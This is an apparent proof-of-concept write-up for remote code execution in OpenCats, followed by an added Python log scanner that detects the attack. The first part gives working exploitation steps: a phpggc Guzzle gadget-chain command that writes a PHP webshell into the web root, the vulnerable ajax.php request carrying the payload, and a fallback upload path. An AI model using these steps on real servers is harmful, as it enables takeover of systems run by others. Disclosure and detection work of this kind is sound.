Remote Code Execution via insecure deserialization in OpenCats getDataGridPager's ajax functionality.

Vulnerable code

[image 1: vulnerable code]

How to achieve command execution

Useful information: OpenCats ships with Guzzle, which provides a known gadget chain.
A serialized object can be crafted with the phpggc tool, which has the Guzzle gadget chain predefined.

  1. Create the payload that will be executed. I will use phpinfo().
    echo "<?php phpinfo(); ?>" > /tmp/shell.php

  2. Create a serialized payload with phpggc that will write the malicious shell to the given directory on the web server.
    ./phpggc -u --fast-destruct Guzzle/FW1 /var/www/html/opencats/pwned.php /tmp/shell.php

[image 2]

  1. Paste the payload into the 'p' parameter.
    /ajax.php?f=getDataGridPager&i=1&p=PAYLOAD_FROM_PREVIOUS_STEP

[image 3]

  1. Execute the webshell.

[image 4]

Ending notes. The upload location may vary from system to system, depending on whether www-data has write permission to the web server's root directory. If / (the web server's root) is not writeable, upload the webshell to '/upload/pwned.php' instead.
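As an added defensive example (not part of the original write-up): a small access-log scanner that flags requests to the getDataGridPager endpoint whose 'p' parameter carries a PHP serialized object. The combined log format, the constructed sample lines and the assumption that 'p' may also arrive base64-wrapped are mine.

```python
"""Flag requests that hand PHP-serialized data to OpenCats' getDataGridPager.

Added example (not part of the original write-up): scans web-server access
log lines for the vulnerable endpoint and checks whether the `p` parameter
carries a PHP serialized object (raw or base64-wrapped, both assumed here).
"""
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Matches the start of a PHP serialized object: O:<len>:"ClassName"
PHP_OBJECT = re.compile(r'O:\d+:"')

def php_object_in(value: str) -> bool:
    """True if the value looks like a PHP serialized object, raw or base64."""
    if PHP_OBJECT.search(value):
        return True
    try:
        decoded = base64.b64decode(value, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):  # not valid base64 at all
        return False
    return bool(PHP_OBJECT.search(decoded))

def is_suspicious_request(path: str) -> bool:
    """Check one request path+query for the getDataGridPager deserialization pattern."""
    parts = urlsplit(path)
    if not parts.path.endswith("/ajax.php"):
        return False
    qs = parse_qs(parts.query)  # percent-decodes values for us
    if qs.get("f", [""])[0] != "getDataGridPager":
        return False
    return any(php_object_in(p) for p in qs.get("p", []))

def scan_log(lines):
    """Return (line_number, request) for every flagged line in combined log format."""
    req = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    hits = []
    for n, line in enumerate(lines, 1):
        m = req.search(line)
        if m and is_suspicious_request(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

# Constructed sample lines; only the third carries a (harmless) serialized object.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /opencats/index.php?m=home HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /opencats/ajax.php?f=getDataGridPager&i=1&p=a%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7D HTTP/1.1" 200 80',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /opencats/ajax.php?f=getDataGridPager&i=1&p=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 80',
]

if __name__ == "__main__":
    for n, r in scan_log(SAMPLE_LOG):
        print(f"line {n}: {r}")
```

A plain serialized array in 'p' (second sample line) is the normal pager state and is not flagged; only the object marker is.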